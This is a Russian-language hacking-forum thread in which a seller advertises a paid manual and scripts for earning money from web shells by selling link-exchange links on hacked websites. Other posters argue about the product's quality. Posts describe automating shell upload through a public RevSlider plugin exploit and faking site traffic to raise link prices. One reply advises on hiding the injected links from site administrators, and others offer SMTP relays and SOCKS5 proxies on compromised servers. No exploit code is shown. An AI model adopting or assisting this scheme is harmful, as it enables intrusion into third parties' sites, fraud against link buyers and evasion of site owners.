А так я стараюсь отвечать всем кто пишет, особенно из списка. Если я вас случайно не занес туда или по каким то причинам игнорил то простите, не всегда это от меня зависит.

Хотя и порядком я обленился в последнее время, что даже форум лень запускать, просто сижу бездельничаю дома, если у кого есть еще интересные предложения и бизнес-схемы, которые вы предлагали мне, пишите еще посмотрим ...

Грабитель
24.05.2014, 13:13
Хотя и порядком я обленился в последнее время, что даже форум лень запускать, просто сижу бездельничаю дома, если у кого есть еще интересные предложения и бизнес-схемы, которые вы предлагали мне, пишите еще посмотрим ...

То вы слишком заняты, то слишком обленились, вы уж как то определитесь, а если нету желания и времени заниматься техподдержкой своих продуктов\скриптов, то смысл вообще их продавать?

В принципе, почитав ваши сообщения, про вас уже складывается определенное мнение, что ИМХО не стоит вообще с вами дел иметь.

FlooP1k
25.05.2014, 16:23
То вы слишком заняты, то слишком обленились, вы уж как то определитесь, а если нету желания и времени заниматься техподдержкой своих продуктов\скриптов, то смысл вообще их продавать?
В принципе, почитав ваши сообщения, про вас уже складывается определенное мнение, что ИМХО не стоит вообще с вами дел иметь.

Ну господи как же вы надоели раздувать из мухи слона, ой он сказал "или занят, или лень" нуууу всее теперь к нему больше обращаться не буду, что за бред вообще?

Если вы действительно хотите чего то от меня пишите в ICQ я отвечу, а то что вы тут на показ пытаетесь на форуме пытаетесь прикопаться хоть к чему то, похоже на детский сад ...

При том, при всем мануал написан очень подробно и понятно по крайней мере 85% людей купивших его не обращается ко мне с глупыми вопросами "а как можно по подробнее?".

Но попадается ж люди на которых мало того что тратишь время так они еще и наговаривают, не нравится как я объясняю разбирайтесь сами, лучше я буду помогать людям которым это действительно интересно и у которых все получается ...

FlooP1k
14.08.2014, 16:20
14.08.2014 прошло второе крупное обновление всех скриптов.

Подробнее:

Как вы уже знаете все биржи (sape,linkfeed,trustlink) перешли на новый формат. Теперь качество ссылки зависит от количества посещений на той странице где оптимизатор хочет купить ссылку, естественно от посещения зависит и цена ссылок. Так что на посещаемых сайтах вы теперь сможете заработать в разы больше чем раньше.

Для того что бы обновиться скачайте новый архив по той же ссылке которая вам пришла после оплаты или напишите мне в ICQ и укажите сразу e-mail с которого вы покупали и я пришлю вам обновление.

Напомню, что это версия Beta поэтому если возникнут какие либо осложнения сразу пишите в ICQ все решим.

Скоро:

Сейчас мы работаем над тем, что бы накручивать все страницы сайта автоматически и этим создавать ложную посещаемость сайта. Благодаря этому цены на все ссылки добавленного вашего сайта будут с наценкой минимум x3-x6, а так же посещаемые страницы больше привлекаются оптимизаторами и выкупать такие ссылки будут быстрее чем раньше, но только для новых сайтов. Теперь монетизировать шеллы будет еще выгодней. Результат уже есть, сейчас тестируем скрипт с группой добровольцев на взаимодействия с различными CMS.

И да я устал повторять в добровольцы могут записаться только те кто купил скрипт, просто полный абсурд спрашивать об этом.

Детали на kidsec.ru (http://kidsec.ru/)

AppS
14.08.2014, 19:32
Автору спасибо! Тема работает! Давай придумывай еще что нить ))

konst55
15.08.2014, 10:34
Рекламная акция?

Вообще-то, если почитать первоисточник, новье в ценообразовании от линкфида нпример, заключается не в учете посещаемости страницы, а в количестве и КАЧЕСТВЕ переходов по ссылкам. Опять-таки судя по форуму линкфида никакаих 3-6-кратного роста доходов не наблюдается. Надо ли говорить, что размещая ссылки на чужих сайтах вебмастер меньше всего заинтересован в том чтобы народ видел и тем более ходил по его ссылкам. Всем армией ботов обзавестись? Я уж не говорю о том, что не хотелось бы удивлять админа кодом нового счетчика на его сайте

BuG_4F
15.08.2014, 10:57
Сколько можно выжать из сайта 4k/5k страниц в гугле, ТИЦ 80, PR 5 на бирже ссылок ?

konst55
15.08.2014, 12:21
Сколько можно выжать из сайта 4k/5k страниц в гугле, ТИЦ 80, PR 5 на бирже ссылок ?

Это как повезет. Можно и до двух лет условно выжать. Чем сайт более посещаемый, тем вероятность нехорошего расклада выше

FlooP1k
15.08.2014, 13:48
Рекламная акция?
Вообще-то, если почитать первоисточник, новье в ценообразовании от линкфида нпример, заключается не в учете посещаемости страницы, а в количестве и КАЧЕСТВЕ переходов по ссылкам. Опять-таки судя по форуму линкфида никакаих 3-6-кратного роста доходов не наблюдается. Надо ли говорить, что размещая ссылки на чужих сайтах вебмастер меньше всего заинтересован в том чтобы народ видел и тем более ходил по его ссылкам. Всем армией ботов обзавестись? Я уж не говорю о том, что не хотелось бы удивлять админа кодом нового счетчика на его сайте

До линкфида я еще не дошел, но очень сомневаюсь что там по другому. В sape уже появился такой параметры у оптимизаторов как SR, который может быть от 1 до 10. И каждой странице присваивается свой SR в зависимости от посещения и еще нескольких факторов. Естественно от количества SR зависит и цена, как по вашему робот-ванга от sape должен определять наценку если бы дело было в переходах?

На счет 3-6 кратного, блин даже лень об этом писать и делать скрины, захотите зайдите сами в sape и сравните цены на SR-1 и SR-10

Многое зависит от тематики и других факторов, даже ТиЦ я бы сказал уже не главный показатель.

Можно и до двух лет условно выжать. Чем сайт более посещаемый, тем вероятность нехорошего расклада выше

Может хватит ваших морально-этических нравоучений? Все кто не занимается этой темой, просто считают своим долгом ляпнуть что то этакое ...

konst55
15.08.2014, 16:25
Про сапу незнаю. Туда еще не так-то просто сайт запихнуть, это в лф берут все

FlooP1k
17.08.2014, 16:39
Про сапу незнаю. Туда еще не так-то просто сайт запихнуть, это в лф берут все

Ну в лф тоже идет наценка за посещаемые страницы, я не знаю как у них робот может вычислять количество будущих переходов по ссылке. Не думаю, что там оптимизаторы платят за ссылку, а потом еще доплачивают за каждый переход ...

konst55
18.08.2014, 07:51
Зачем будущих? Прошлых. Страница может быть очень посещаемой, но ссылки где-то внизу или вообще за границей видимости, их никто не видит, по ним никто не ходит.

Чем больше с этой страницы переходов тем дороже на ней размещение. Все просто

FlooP1k
23.08.2014, 02:50
Зачем будущих? Прошлых. Страница может быть очень посещаемой, но ссылки где-то внизу или вообще за границей видимости, их никто не видит, по ним никто не ходит.
Чем больше с этой страницы переходов тем дороже на ней размещение. Все просто

В принципе сделать переход по ссылке рекламодателя тоже не составит особого труда, но до trustlinka, как и говорил еще не добрался ...

IloveRU
05.09.2014, 16:23
Сайт, где можно купить руководство, недоступен. Сейчас товар актуален?

IloveRU
09.09.2014, 00:33
купил, ща буду смотреть, по результатам, возможно, отпишусь

IloveRU
12.09.2014, 05:20
автор руководства не отвечает на вопросы, которые я попросил прояснить

FlooP1k
12.09.2014, 16:16
Да очень извиняюсь, не буду отмазываться видел ваше сообщение, но банально забыл отписаться ...

IloveRU
12.09.2014, 20:57
ответ действительно получил, причем ответ по сути.

что касается руководства в целом, могу сказать, что изложенные в нем мысли достаточно разумные и рациональные. то есть не абстрактная теория, а именно то, что пригодится на практике. оцениваю руководство как хорошее.

geramins
16.09.2014, 19:04
Авто как ты можешь добавить сайт в GGL если надо прислать подтверждение владения доменом.

IloveRU
19.09.2014, 17:15
только что автор провел для меня бесплатную консультацию, в ходе которой помог разъяснить некоторые вопросы, которые я не смог понять. объяснял толково и, если требовалось, более подробно.

IloveRU
23.09.2014, 12:28
вроде как мой личный блогу тут уже получается))

автор опять игнорит ("буду днем", потом "буду ночью", а ночью не отвечает).

сайт, который был добавлен ранее не работает как следует - ссылки отвалились в error - возможно, схема нерабочая?

jizzle
26.09.2014, 11:46
А когда у тебя туалетная бумага закончится, ты тоже к ТС будешь долбиться с требованием разобраться?

IloveRU
28.09.2014, 16:59
Тут дело в том, что если даже ТС не смог добавить мой сайт, который соответствует требованиям (популярная цмс), то, очевидно, что есть вероятность того, что схема не работает.

FlooP1k
28.09.2014, 21:07
Тут дело в том, что если даже ТС не смог добавить мой сайт, который соответствует требованиям (популярная цмс), то, очевидно, что есть вероятность того, что схема не работает.

Что за маразм вообще?? У вас случайно не "раздвоение личности"?

Один сайт не получилось добавить и я уже 20 раз объяснил почему!! Вы сказали: "дык возможно это скрипты на работают". Я сказал: "Скрипты все работают идеально и ссылки сохраняются на этом сайте, только не выводятся по определенным причинам и что по одному сайту судить это полный дибилизм, пробуйте добавлять остальные", вы сказали: "Да окей, да я и не сужу, попробую еще сайт добавить".

И после этого вы отписываетесь тут в посте, что схема возможно не работает?

P,S, Я не знаю, как вообще на подобное нужно реагировать, поэтому буду просто молчать ...

IloveRU
29.09.2014, 07:43
Во-первых, Вы не объяснили почему траслинк не платит за ссылки на сайте, которые выводятся, согласно Вашим словам, абсолютно правильно.

Во-вторых, факт в том, что сайт добавлен в трастлинк, но трастлинк не платит за ссылки, которые выводятся с помощью этого скрипта.

Чтобы не вводить людей в заблуждение сформулирую свое описание ситуации предельно корректно и точно.

Иногда может происходить так, что линкобиржи не будут платить за ссылки на сайтах, подходящих по параметрам (тиц, CMS, количество страниц в индексе), на которых используются скрипты ТС. Почему так - ТС объяснить не сможет

Я не говорю, что так происходит всегда или часто. Но как минимум иногда так происходит, думаю с этим Вы спорить не будете.

Грабитель
29.09.2014, 08:37
Что за маразм вообще?? У вас случайно не "раздвоение личности"?

Отличное отношение к делу.

Эмм, кстати, никого не смущает, что большинство купивших скрипт недовольны? Хотя да, сейчас придёт тс и быстренько объяснит, что на самом деле все довольны только не отписываются

И ещё, немножко поизучав код ссылок ТСа, обнаружил множество ошибок и багов, в частности из за которых код будет некорректно работать на разных конфигурациях и версиях php, никакие технические моменты не были учтены, всё сделано коряво и посредственно, пытался по этому поводу связаться с ним, но как всегда "язанятмногодел", ну окей.

FlooP1k
30.09.2014, 06:10
Во-первых, Вы не объяснили почему траслинк не платит за ссылки на сайте, которые выводятся, согласно Вашим словам, абсолютно правильно.
Во-вторых, факт в том, что сайт добавлен в трастлинк, но трастлинк не платит за ссылки, которые выводятся с помощью этого скрипта.
Чтобы не вводить людей в заблуждение сформулирую свое описание ситуации предельно корректно и точно.
Иногда может происходить так, что линкобиржи не будут платить за ссылки на сайтах, подходящих по параметрам (тиц, CMS, количество страниц в индексе), на которых используются скрипты ТС. Почему так - ТС объяснить не сможет
Я не говорю, что так происходит всегда или часто. Но как минимум иногда так происходит, думаю с этим Вы спорить не будете.

Во-первых: Где я написал, что ссылки выводятся?

Скрипт нормально стучит в бд, забирает ссылки, сохраняет в файл, но не выводит их на сайте (Притом, что в дебаг моде тестовые ссылки показывает нормально).

Не нужно косить под дурака, я вам 20 раз сказал из за чего это может быть:

1) Бан этого сайта в трастлинке за скрытие ссылок (По крайней мере раньше так было, если забаненый сайт удалить из системы то добавить его можно в новый акк, но ссылки не выводятся).

2) Возможной причиной может быть тонна чьего то закодированного кода (уверен шелл уже изюзанный кем то 40 раз) и я не знаю что в этом коде.

3) Я ставил даже оригинальный скрипт с трастлинка эффект идентичный ...

Потом я вам сказал, что на сайте уже стоят все остальные линкобиржи кроме траста и что ВС на страницах огромный и получать вы будете копейки, не стоит вообще останавливаться на этом шелле.

Так же сказал что еще посмотрю код (хотя уж точно не должен был этого делать по причинам выше), как проснусь, но вы умудрились мне за это время накатать такую телегу с обвинениями, а потом еще пришли сюда и на публику начали обвинять в чем то настолько бредовом, почему я после этого вообще должен отвечать вам?

ТС, про манибек, думаю, спрашивать бесполезно?

Надеюсь это была шутка?

Отличное отношение к делу.
Эмм, кстати, никого не смущает, что большинство купивших скрипт недовольны? Хотя да, сейчас придёт тс и быстренько объяснит, что на самом деле все довольны только не отписываются

Кто вы и что вы от меня хотите? Нет серьезно уже третий раз вы пытаетесь под шумок затролить меня. Причем реально затролить, ждете пока кто то съязвит, выступаете в роли жертвы и пытаетесь прикопаться к каждому моему слову, теперь еще и какие то баги нашли?)))

P.S. Наверно вы еще не поняли, что мануал и поддержку я делаю не ради денег и от того что вы подымите бунт (по вашим постам именно к этому вы и стремитесь, так как пишите все на публику!) закончится только тем, что я просто закрою паблик продажи и обновы и буду работать только с той дюжиной, которые действительно серьезно занимаются этим. Только жалко остальных людей ...

P.SSS. Если действительно хотите что то решить или получить или обвинить пишите в ПМ или ICQ. В этом топике я буду обсуждать только обновления, интересные вопросы и аргументированные обвинения.

До меня просто только сейчас дошло, что вы пишите тут только что бы на публику поиграть, но еще не одного факта я здесь не видел.

Сбербанк
01.10.2014, 20:18
Периодически пишу в аську автору топика по поводу обновлений, ответа нету, в очередной раз пугать отрицательным отзывом чтобы выманить на разговор бессмысленно, поэтому касаемо пункта:

Для того что бы обновиться скачайте новый архив по той же ссылке которая вам пришла после оплаты или напишите мне в ICQ и укажите сразу e-mail с которого вы покупали и я пришлю вам обновление.
Напомню, что это версия Beta поэтому
если возникнут какие либо осложнения сразу пишите в ICQ
все решим.

Автор своих условий не выполняет, поэтому покупая его скрипты, сомнительного содержания (его скрипты не работают вообще, при этом скрипты выдаваемые самой биржей - без проблем, из них и собрал свой аналогичный)

просто будьте готовы пополнить список недовольных, и общаться с ним после покупки вы будете только в этой теме, и нигде более, а вопросы к нему после покупки уж поверьте возникнут.

Как я наблюдаю за последними сообщениями, и ответами автора, время облить грязью своих клиентов в этой теме он находит, а вот ответить на простые сообщения в ICQ у него времени катастрофически нет.

sviftgraf
10.10.2014, 17:45
Вчера приобрел доступ,давно интересовала тема бирж, на форуме последняя запись 2013 года. Скрипты ужасно криво работают, ТС постоянно онлайн, но морозиться и не отвечает. Если тс не ответит выложу то что купил на всех известных бордах.

Как тсу хватило ума упоминать складчиков, мол не надейтесь вся поддержка на форуме, ага, на котором 15 постов.

sviftgraf
10.10.2014, 17:50
з.ы. для теста методом тса в сапе добавил 10 площадок этой ночью, с тиц выше 200, все не прошли модерацию, теперь можно забыть о сапе с этими площадками.

FlooP1k
10.10.2014, 19:50
его скрипты не работают вообще

Если есть действительно проблемы пишите в ICQ.

Так то кроме sviftgraf никто не отписал.

Процентов 90% написанного вами я заслужил (раз уж отзыв не один) но писать что скрипты не работают это не правда ...

Mobile
19.10.2014, 01:02
Господа, здесь не болталка и не арбитраж, отношения выясняем в другом месте. Еще раз повторится, отправлю заявку на бан.

UPD. Смотрите внимательно, как называется раздел. Продаж тут нет, арбитража тоже. Еще раз увижу нарушение правил здесь, виновных в бан, а тему закрою.

FlooP1k
05.06.2015, 14:13
UPDATE 24.02.2014:

Обновление 04.06.2015:

Подробности на http://kidsec.ru

Настоятельно рекомендую не использовать старые скрипты, потому как при загоне новых сайтов можете схлопотать бан. Собственно поэтому и выходит это крупное обновление!

1) Добавлена новая уязвимость: пример полной автоматизации заливки шелла через perl exploit, на примере уязвимости в плагине revslider которая собрала огромный ажиотаж за последнее время. Этот плагин очень популярный и с каждым днем появляются новые уязвимый сайты, так что сливки успеют снять все. А так же можно на примере использовать любой актуальный эксплоит с http://exploit-db.com

2) Обновлены скрипты всех бирж до актуальной версии и изменена структура.

3) Переписан мануал на новый лад и в нем учтены все прошлые обновления.

4) Тест-драйв всех новых скриптов и фикс всех багов (спасибо всем откликнувшимся, уже раздал шеллы в виде благодарности)

Так же в связи с неактуальности старых скриптов и они уже выложены где то в паблике. Но некоторые жалуются, что там есть чужие бэкдоры, поэтому выкладываю старый мануал здесь, как раз можете ознакомиться о чем пойдем речь. Ссылка: http://kidsec.ru/msh/star.zip

McNamara
30.06.2015, 23:33
Насколько безопасно заниматься биржами? Что бы не было недомолвок vpn/tor/public wi-fi и прочие средства для поддержания анонимности - это есть и освоенно, но... Могут ли тебя взять за яйца через wm кошелек? Занимался в основном легалом до этого, нету опыта с сомнительными финансовыми потоками.

FlooP1k
01.07.2015, 02:43
↑ (https://antichat.live/posts/3863906/)
Насколько безопасно заниматься биржами? Что бы не было недомолвок vpn/tor/public wi-fi и прочие средства для поддержания анонимности - это есть и освоенно, но... Могут ли тебя взять за яйца через wm кошелек? Занимался в основном легалом до этого, нету опыта с сомнительными финансовыми потоками.

Пишите в ICQ: 353521939 иои в ПМ.

Take_IT
08.07.2015, 11:57
я вот одного не пойму, почему полезные статьи такие как например "полный faq по mysql инъекциям" от Dr.Z3r0 открепили, а ЭТУ ХУЙНЮ оставили?! куча ссылок на сайт автора, чето то там предлагают купить, доплатить , etc... это раздел статьи или торговый?

Unknowhacker
11.07.2015, 14:07
↑ (https://antichat.live/posts/3866210/)
я вот одного не пойму, почему полезные статьи такие как например "полный faq по mysql инъекциям" от Dr.Z3r0 открепили, а ЭТУ
ХУЙНЮ
оставили?!

Потому что ХУ*НЯ не исчезает и не передаётся - она переходит из одного состояния в другое при этом её значение не изменяется. xDD

profishell
11.07.2015, 18:23
↑ (https://antichat.live/posts/3866210/)
я вот одного не пойму, почему полезные статьи такие как например "полный faq по mysql инъекциям" от Dr.Z3r0 открепили, а ЭТУ
ХУЙНЮ
оставили?! куча ссылок на сайт автора, чето то там предлагают купить, доплатить , etc... это раздел статьи или торговый?

Потому что прочитав статью от Dr.Z3r0 человек сам сможет добыть себе доступы, бесплатно, а тут надо заплатить (и за обновы тоже, кстати).

Способы монетизации - это сильно, скорее пассивный доход, гораздо выгоднее сливать трафф, да все способы лежат на поверхности - просто залез в тематический раздел и узнал кто зачем покупает шеллы (элементарно узнается: на что чекать, какие функции должны быть и другие наводящие вопросы)... В целом мануал сильно для новичков, автор предоставляет заюзанные в хвост и в гриву уязвимости, но не предоставляет самого главного - нормальной клоаки (хайда от админа, называйте как удобно), соответственно использовать можно только совсем "забытые" сайты, так как клоаки нет и админ быстро спалит ссылки, а значит снесет код...

Финт с куками это не клоака, а шутка юмора.

P.S. Цена сильно завышена, 1-1,5к рублей - больше платить там не за что, но это имхо.

FlooP1k
11.07.2015, 19:50
↑ (https://antichat.live/posts/3867256/)
Способы монетизации - это сильно, скорее пассивный доход, гораздо выгоднее сливать трафф

Чушь

В целом мануал сильно для новичков, автор предоставляет заюзанные в хвост и в гриву уязвимости

Я как бы предлагаю способ, как можно заюзать практически любую паблик уязвимость массово при этом не переписывая код эскплоита, собственно эта уязвимость была взята для примера. Странная привычка отписываться в теме, когда вы ее даже не читали. Если вы действительно хотели за такие копейки получить приват уязвимость, то это даже смешно ...

Но не предоставляет самого главного - нормальной клоаки (хайда от админа, называйте как удобно), соответственно использовать можно только совсем "забытые" сайты, так как клоаки нет и админ быстро спалит ссылки, а значит снесет код...
Финт с куками это не клоака, а шутка юмора.

Очень даже интересно, если вы не пустослов и это не банальный детский треп - предложите свой метод хотя бы теоретический, как прятать ссылки от админов и от оптимизаторов линкобирж при этом не мешая ботам поисковиков и линкобирж находить эти самые ссылки. Но при этом не забудьте о массовости, то есть ваша так называемая "клоака" должна работать как на популярных CMS, так и на банальных самописных с инклудами. Если вы намекаете на то, что бы собирать IP в директории админки, то это очень бредово и не практично!

P.S. Я сам заложник этой ситуации, я уже давно забил на всю эту идею обучения, но люди которым это действительно интересно в последнее время просто стали атаковать ICQ с запросами, что я обещал делать дальнейшие обновления, а со старым скриптом получает масс баны. Поэтому пришлось выпустить обновление. И я некого не агитирую покупать или что то подобное, более того я выложил старую версию мануала в тему и люди со знанием PHP и небольшим знанием бирж могут легко переделать скрипт под себя и работать не покупая обнов.

Прозвучал один адекватный коммент от TAKE_IT, с чем я согласен и никакого отношения к прикреплению тем не имею. Дальше пошел просто флейм.

Прочтите комментарий модератора:

↑ (https://antichat.live/posts/3778888/)
Господа, здесь не болталка и не арбитраж, отношения выясняем в другом месте. Еще раз повторится, отправлю заявку на бан.
UPD. Смотрите внимательно, как называется раздел. Продаж тут нет, арбитража тоже. Еще раз увижу нарушение правил здесь, виновных в бан, а тему закрою.

И оставьте уже эту тему в покое))

UPD to profishell: Я вас услышал, прочитав ваш следующий пост я понял что вы этой теме разбираетесь ровно настолько же, как мой кот. Поэтому даже не интересно отвечать дальше ...

profishell
11.07.2015, 22:09
↑ (https://antichat.live/posts/3867287/)
Чушь
Я как бы предлагаю способ, как можно заюзать практически любую паблик уязвимость массово при этом не переписывая код эскплоита, собственно эта уязвимость была взята для примера. Странная привычка отписываться в теме, когда вы ее даже не читали. Если вы действительно хотели за такие копейки получить приват уязвимость, то это даже смешно ...
Очень даже интересно, если вы не пустослов и это не банальный детский треп - предложите свой метод хотя бы теоретический, как прятать ссылки от админов и от оптимизаторов линкобирж при этом не мешая ботам поисковиков и линкобирж находить эти самые ссылки. Но при этом не забудьте о массовости, то есть ваша так называемая "клоака" должна работать как на популярных CMS, так и на банальных самописных с инклудами. Если вы намекаете на то, что бы собирать IP в директории админки, то это очень бредово и не практично!
P.S. Я сам заложник этой ситуации, я уже давно забил на всю эту идею обучения, но люди которым это действительно интересно в последнее время просто стали атаковать ICQ с запросами, что я обещал делать дальнейшие обновления, а со старым скриптом получает масс баны. Поэтому пришлось выпустить обновление. И я некого не агитирую покупать или что то подобное, более того я выложил старую версию мануала в тему и люди со знанием PHP и небольшим знанием бирж могут легко переделать скрипт под себя и работать не покупая обнов.
Прозвучал один адекватный коммент от TAKE_IT, с чем я согласен и никакого отношения к прикреплению тем не имею. Дальше пошел просто флейм.
Прочтите комментарий модератора:
И оставьте уже эту тему в покое))

По поводу чуши или нет, ну давайте, расскажите сколько можно выжать с сайта с помощью пусть 3 популярных бирж - 100 рублей в день? 200? А если код спалят через 30 минут?)

Вы сами признали, что продаете за 4к - паблик, все верно? Коды - смех, скачиваем код линкобиржи и собираем в 1 файл, ну и файлик со ссылками прячем поглубже, тут даже кодером быть не нужно. По поводу "способа" использования любого паблика - открываем тему уязвимостей для joomla/wp, берем любой перловый сплоит и меняем параметры, все просто и тоже паблик.

По поводу клоаки - вы сами советуете использовать популярные cms, так просто проверяйте авторизован или нет юзер, при авторизации - записывайте дополнительную куку, далее есть тьма параметров по которым можно разделять посетителей и админов в том числе и тех, которые передают браузеры...

Поэтому и говорю, что цена данному материалу - 1/1,5к.

По поводу выяснения отношений, это не выяснения отношений, это просто более точно описание вашего товара.

3ran
11.07.2015, 23:42
Лучшая монетизация шеллов - создание smtp-релеев и поднятие на них socks5.

Кто не знает как,пишите в личку,либо в icq что на аватаре

sc0rp
13.07.2015, 04:18
↑ (https://antichat.live/posts/3867369/)
Лучшая монетизация шеллов - создание smtp-релеев и поднятие на них socks5.
Кто не знает как,пишите в личку,либо в icq что на аватаре

Почти

Лучшая монетизация это впаривать збрученное\паблик говно шелы и такой же софт по их добыче всем налево и направо.

3ran
13.07.2015, 04:20
↑ (https://antichat.live/posts/3867726/)
Почти
Лучшая монетизация это впаривать збрученное\паблик говно шелы и такой же софт по их добыче всем налево и направо.

А чем хуже впаривать нормальный софт?)

sc0rp
13.07.2015, 04:35
С каких пор перерисованный шеллбаттон, бернер и крякнутый амс стали нормальным софтом?) включая мануалы по обходу спам фильтров и настройке того же амса)

Demchik
01.10.2015, 14:17
del

FlooP1k
21.01.2016, 15:25
Мануал больше не поддерживается, последнюю версию с обновленными кодами и т.д. можно скачать по ссылке: http://kidsec.ru/msh/newmonshe.zip

Описание все там же: http://kidsec.ru/

P.S. Не хочу оставлять ложных надежд для новичков, так как линкобиржи уже пользуются не такой популярностью как раньше. Но хочу сказать имея качественные шеллы тиц 100+ (штук 15-20) в этой теме до сих пор спокойно можно выжимать 100$+ в день.

На шеллах же качества брут и с тиц 10-20 далеко не выедешь.

Всем удачи!

aldemko
16.02.2016, 14:40
Вот я баран

а я гугл рекламку вешал )

хотя мало но стабильно - поденял рекламу владельцев сайта

попробую ваши советы

спасибо